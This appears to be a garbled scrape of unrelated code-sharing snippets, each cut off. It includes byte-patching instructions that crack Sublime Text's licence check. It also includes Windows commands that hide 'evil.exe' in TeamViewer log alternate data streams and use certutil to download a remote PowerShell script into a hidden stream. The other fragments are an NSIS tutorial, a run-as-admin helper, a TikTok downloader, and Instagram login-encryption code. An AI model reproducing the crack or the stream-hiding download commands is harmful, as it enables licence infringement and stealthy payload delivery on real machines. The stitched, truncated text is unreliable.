import sys
import os
NOP = 0x90
offsets_and_values = {
0x000035FE: 0x01,
0x0000361D: 0x95,
0x0000361E: 0x9E,
0x0000361F: 0x57,
- Go to https://hexed.it/
- Click
Open File
in the top left corner, navigate to instalation folder and selectsublime_text.exe
- Press CTRL + F or on the
Search for
bar in the left panel and look for: 80 79 05 00 0F 94 C2 - Now in the editor, click on the first byte (80) and start replacing each byte by: C6 41 05 01 B2 00 90
- Finally, in the top left corner again, click on
Save as
and replace the old executable file with the newly created one.
Enjoy an Unlimited User License!
Nullsoft Scriptable Install System is also known as NSIS open-source system to create Windows application installers. NSIS is a script-based system allowing you to create the logic behind your installer/setup file in a complex way to install tasks. NSIS offers plug-ins and other scripts, for example, to download/install 3rd-party files or communicate with Windows.
This tutorial will guide you through installing and creating your first Windows installer with Nullsoft Scriptable Install System and how to compile your project. Captura Portable will be used as "our application" for the sake of this tutorial.
Head to NSIS official site and download the latest release and install it. Run NSIS and you will be welcomed with a menu like below, It's always a good practice to read the Documentation before jumping in t
/** | |
* --- Continous Execution Library --- | |
* | |
* Copyright (c) 2013 Patrick Martinent | |
* | |
* Licensed under the Apache License, Version 2.0 (the "License"); | |
* you may not use this file except in compliance with the License. | |
* You may obtain a copy of the License at | |
* | |
* http://www.apache.org/licenses/LICENSE-2.0 |
#!python | |
# coding: utf-8 | |
# by GaryLee | |
# https://gist.github.com/GaryLee/d1cf2089c3a515691919 | |
import sys | |
import ctypes | |
def run_as_admin(argv=None, debug=False): |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
Vào một trang video Tiktok bất kỳ, copy đoạn code phía dưới, quay lại trang xem video Tiktok rồi nhấn Ctrl + Shift + I
(hoặc Command + Shift + I
trên Macbook). Sau đó qua tab console, paste đoạn code vào rồi nhấn Enter, chờ tí tẹo Video sẽ bắt đầu tải.
(function () {
const videoEl = document.querySelector('video');
function downloadVideo(url) {
fetch(url).then(response => {
if (!response.ok) throw new Error(`HTTP error! Status: ${response.status}`);
return response.blob();
KEYMAPOPTS="us us" | |
HOSTNAMEOPTS="-n alpine" | |
INTERFACESOPTS="auto lo | |
iface lo inet loopback | |
auto eth0 | |
iface eth0 inet dhcp | |
hostname alpine | |
" | |
TIMEZONEOPTS="-z UTC" |
using System.Text; | |
using AsmResolver; | |
using AsmResolver.DotNet; | |
using AsmResolver.DotNet.Builder.Metadata.Blob; | |
using AsmResolver.DotNet.Builder.Metadata.Strings; | |
using AsmResolver.DotNet.Code.Cil; | |
using AsmResolver.DotNet.Signatures; | |
using AsmResolver.IO; | |
using AsmResolver.PE; | |
using AsmResolver.PE.DotNet.Builder; |
// Packages need to be installed: | |
// Sodium.Core | |
// System.Security.Cryptography.Algorithms | |
// The values of publicKey,keyId,version are from shared_data. | |
// You need to call https://www.instagram.com/data/shared_data/ to get shared_data first | |
public static string GenerateEncPassword(string password, string publicKey, string keyId, string version) | |
{ | |
var time = DateTime.UtcNow.ToTimestamp(); // Unix timestamp | |
var keyBytes = publicKey.HexToBytes(); // Convert a hex string to a byte array |